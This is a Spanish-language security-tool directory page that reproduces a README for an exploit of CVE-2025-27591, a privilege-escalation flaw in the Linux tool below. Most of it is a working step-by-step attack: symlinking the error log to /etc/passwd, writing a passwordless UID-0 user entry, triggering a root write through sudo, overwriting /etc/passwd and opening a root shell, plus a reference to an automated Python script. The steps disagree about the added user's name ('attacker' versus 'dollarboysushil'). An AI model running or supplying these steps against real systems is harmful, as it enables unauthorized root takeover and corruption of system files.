Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Linux-Privilege-Escalation-CVE-2025-27591 — CVE-2025-27591 es una vulnerabilidad conocida de escalada de privilegios en el servicio Below (versión < v0.9.0). | Kitploit
Herramientas/GitHubGitHub/dollarboysushil/linux-privilege-escalation-cve-2025-27591
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de PenetraciónRed Teaming
GitHubdollarboysushil/linux-privilege-escalation-cve-2025-27591

Linux-Privilege-Escalation-CVE-2025-27591

CVE-2025-27591 es una vulnerabilidad conocida de escalada de privilegios en el servicio Below (versión < v0.9.0).

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
723hace 1 añoAún no revisado

CVE-2025-27591 - Escalada de Privilegios mediante Enlace Simbólico Escribible en below

Resumen

Este es un exploit simple para CVE-2025-27591, una vulnerabilidad de escalada de privilegios local en la herramienta de monitoreo del sistema Linux below. La vulnerabilidad afecta a versiones anteriores a v0.9.0 y se origina por asignaciones incorrectas de permisos en el sistema. El problema fue descubierto en enero de 2025 y divulgado públicamente el 12 de marzo de 2025 (SecurityOnline, OpenWall). Cuando below se ejecuta con sudo, puede registrar errores en un directorio escribible por cualquier usuario (/var/log/below), lo que permite a atacantes crear un enlace simbólico de un archivo de registro hacia objetivos sensibles como /etc/passwd.

Al explotar esto, un usuario sin privilegios que tenga acceso a below mediante sudo puede escalar privilegios a root.


Detalles de la Vulnerabilidad

  • ID de CVE: CVE-2025-27591
  • Herramienta Vulnerable: below
  • Funcionalidad Afectada: Registro de logs mediante below record
  • Ruta Vulnerable: /var/log/below/error_root.log
  • Requisitos del Ataque:
    • El directorio /var/log/below es escribible por cualquier usuario
    • El atacante puede ejecutar sudo /usr/bin/below record sin contraseña

Pasos del Exploit (Manual)

✅ Paso 1: Verificar que el directorio de logs sea escribible por todos Deberías ver:

root@kitploit:~
drwxrwxrwx 2 root root 4096 ... /var/log/below

alt text

✅ Paso 2: Eliminar cualquier error_root.log existente

root@kitploit:~
rm -f /var/log/below/error_root.log

✅ Paso 3: Crear un enlace simbólico hacia /etc/passwd

root@kitploit:~
ln -s /etc/passwd /var/log/below/error_root.log

luego verifica con

root@kitploit:~
ls -la /var/log/below/error_root.log
# debería mostrar: error_root.log -> /etc/passwd

alt text

✅ Paso 4: Crear un archivo de payload Esto agregará un nuevo usuario root llamado attacker sin contraseña:

root@kitploit:~
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload

estructura del archivo

root@kitploit:~
username:password:UID:GID:comment(home/full name):home_directory:shell

lo clave aquí es, UID y GUID estamos estableciendo UID y GUID a 0, haciendo que el usuario sea root y el ID de grupo = grupo root alt text

✅ Paso 5: Desencadenar la escritura de logs como root Este es el núcleo del exploit.

root@kitploit:~
sudo /usr/bin/below record

Se espera que este comando falle o se agote el tiempo — pero intentará escribir logs de error en /var/log/below/error_root.log, que en realidad es /etc/passwd. 💡 En algunos casos, esto solo puede corromper /etc/passwd — por lo que lo sobrescribimos completamente a continuación.

✅ Paso 6: Sobrescribir /etc/passwd mediante el enlace simbólico

root@kitploit:~
cp /tmp/payload /var/log/below/error_root.log

alt text

✅ Paso 7: Convertirse en root

root@kitploit:~
su attacker

Se abrirá un shell de root sin necesidad de contraseña. alt text

Pasos del Exploit (Automático)

root@kitploit:~
python3 dbs_exploit.py

alt text

Descargar herramienta